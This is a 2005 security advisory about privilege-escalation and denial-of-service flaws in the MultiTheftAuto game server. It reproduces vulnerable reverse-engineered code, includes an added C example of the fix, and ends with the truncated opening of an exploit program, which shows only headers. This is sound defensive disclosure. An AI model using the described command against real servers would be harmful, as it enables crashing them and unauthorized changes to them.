
Monday, September 26, 2005

[NEWS] MultiTheftAuto Privileges Escalation and DoS Vulnerabilities

The following security advisory was sent to the SecuriTeam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

MultiTheftAuto Privileges Escalation and DoS Vulnerabilities
------------------------------------------------------------------------

SUMMARY

MultiTheftAuto (MTA) is a closed-source mod and server that adds multiplayer
capabilities to <http://www.rockstargames.com/grandtheftauto3/> Grand Theft
Auto III and <http://www.rockstargames.com/vicecity/pc/> Grand Theft Auto:
Vice City.

MultiTheftAuto does not check privileges for a command that lets any client
overwrite the message of the day, and the same command can be used by an
attacker to crash the server (DoS).

DETAILS

Vulnerable Systems:
* MultiTheftAuto version 0.5 patch 1 and prior

Privilege Escalation:
The MTA server has the remote administration option enabled by default.
The problem is an undocumented command (number 40) which allows the content
of the motd.txt file, used for the message of the day, to be modified or
deleted.
It is the only command which does not check whether the client is an
administrator, so any client without permissions can use it.

Denial of Service:
Command 40 also causes a second problem, located in the same function, which
looks incomplete or experimental, as shown by the following "retrieved"
(reverse-engineered) code:
// open file for writing "w"
length = *(u_int *)(src - (src % 4096));  // length read from the 4096-byte-aligned base of the buffer, not from the packet
for(i = j = 0; i < length; i++) {
    if(src[i] == '\n') dst[j++] = '\r';   // LF -> CRLF conversion
    dst[j++] = src[i];
    if(j < 1024) continue;                // flush dst every 1024 bytes
    if(!WriteFile(...)) break;
    j = 0;
}
// close file

length ends up being 0xffffffff (-1), so the loop is almost endless and only
stops when src[i] reaches an unmapped region of memory and the read faults.
The result is an immediate crash of the MTA server.

Only the Windows server seems to be affected by the crash, because on Linux
the function is replaced by the following, still incorrect, code, which does
not raise an exception:
fd = fopen("motd.txt", "w");
fwrite(data + 4, 1, data, fd); // yes, the buffer pointer itself is passed as the byte count
fclose(fd);
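The two defects described above, a command that skips the administrator check and a write loop driven by a length that was never validated against the packet, come down to the same fix: take the length from the packet, check it against the bytes actually received, and enforce the privilege check once in the dispatcher so that no individual handler can omit it. The following is an added example written for this page, not MTA's code; the packet layout (4-byte little-endian length followed by the body), the command table, the in-memory stand-in for motd.txt and all function names are assumptions.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Assumed layout for this example (not MTA's real wire format):
 * [u32 little-endian body length][body bytes]. */
#define CMD_MOTD_WRITE 40     /* command number from the advisory */
#define MOTD_MAX       4096   /* largest message of the day we accept */

enum { HANDLED = 0, ERR_DENIED = -1, ERR_MALFORMED = -2, ERR_UNKNOWN = -3 };

struct client { int is_admin; };

/* LF -> CRLF copy bounded by the bytes actually received (avail) and by the
 * destination capacity. Returns bytes written, or -1 if it would not fit.
 * The original loop trusted a length it never took from the packet. */
long crlf_copy(char *dst, size_t dst_cap, const uint8_t *src, size_t avail)
{
    size_t j = 0;
    for (size_t i = 0; i < avail; i++) {
        size_t need = (src[i] == '\n') ? 2 : 1;
        if (j + need > dst_cap)
            return -1;
        if (src[i] == '\n')
            dst[j++] = '\r';
        dst[j++] = (char)src[i];
    }
    return (long)j;
}

/* Validate the declared length against what was really received. */
int parse_motd_body(const uint8_t *pkt, size_t pkt_len,
                    const uint8_t **body, size_t *body_len)
{
    if (pkt_len < 4)
        return ERR_MALFORMED;
    uint32_t declared = (uint32_t)pkt[0] | ((uint32_t)pkt[1] << 8) |
                        ((uint32_t)pkt[2] << 16) | ((uint32_t)pkt[3] << 24);
    if (declared > pkt_len - 4 || declared > MOTD_MAX)
        return ERR_MALFORMED;   /* 0xffffffff is rejected here, not looped over */
    *body = pkt + 4;
    *body_len = declared;
    return HANDLED;
}

typedef int (*handler_fn)(const uint8_t *pkt, size_t len, char *out, size_t out_cap);

/* Writes the converted text into out (a buffer standing in for motd.txt). */
static int handle_motd_write(const uint8_t *pkt, size_t len, char *out, size_t out_cap)
{
    const uint8_t *body;
    size_t body_len;
    if (out_cap == 0)
        return ERR_MALFORMED;
    int rc = parse_motd_body(pkt, len, &body, &body_len);
    if (rc != HANDLED)
        return rc;
    long n = crlf_copy(out, out_cap - 1, body, body_len);  /* keep room for NUL */
    if (n < 0)
        return ERR_MALFORMED;
    out[n] = '\0';
    return HANDLED;
}

/* Every command carries its privilege flag; the dispatcher enforces it once,
 * so no handler can be "the only one that forgets". */
struct command { int id; int admin_only; handler_fn fn; };
static const struct command commands[] = {
    { CMD_MOTD_WRITE, 1, handle_motd_write },
};

int dispatch(const struct client *c, int cmd, const uint8_t *pkt, size_t len,
             char *out, size_t out_cap)
{
    for (size_t k = 0; k < sizeof commands / sizeof commands[0]; k++) {
        if (commands[k].id != cmd)
            continue;
        if (commands[k].admin_only && !c->is_admin)
            return ERR_DENIED;
        return commands[k].fn(pkt, len, out, out_cap);
    }
    return ERR_UNKNOWN;
}

int main(void)
{
    /* Constructed packets: a valid body, and one carrying the 0xffffffff length. */
    uint8_t good[] = { 11, 0, 0, 0, 'h','e','l','l','o','\n','w','o','r','l','d' };
    uint8_t bad[]  = { 0xff, 0xff, 0xff, 0xff, 'x' };
    struct client guest = { 0 }, admin = { 1 };
    char motd[64];

    printf("guest -> %d\n", dispatch(&guest, CMD_MOTD_WRITE, good, sizeof good, motd, sizeof motd));
    printf("admin -> %d, motd=\"%s\"\n",
           dispatch(&admin, CMD_MOTD_WRITE, good, sizeof good, motd, sizeof motd), motd);
    printf("admin, bad length -> %d\n", dispatch(&admin, CMD_MOTD_WRITE, bad, sizeof bad, motd, sizeof motd));
    return 0;
}
```

When the converted text is written to the real file, the byte count passed to fwrite is the validated value returned by crlf_copy (`fwrite(motd, 1, (size_t)n, fd)`), which is the count the Linux snippet above replaces with the buffer pointer.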

Exploit:
winerr.h can be found at:
http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

mtaboom.c:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1
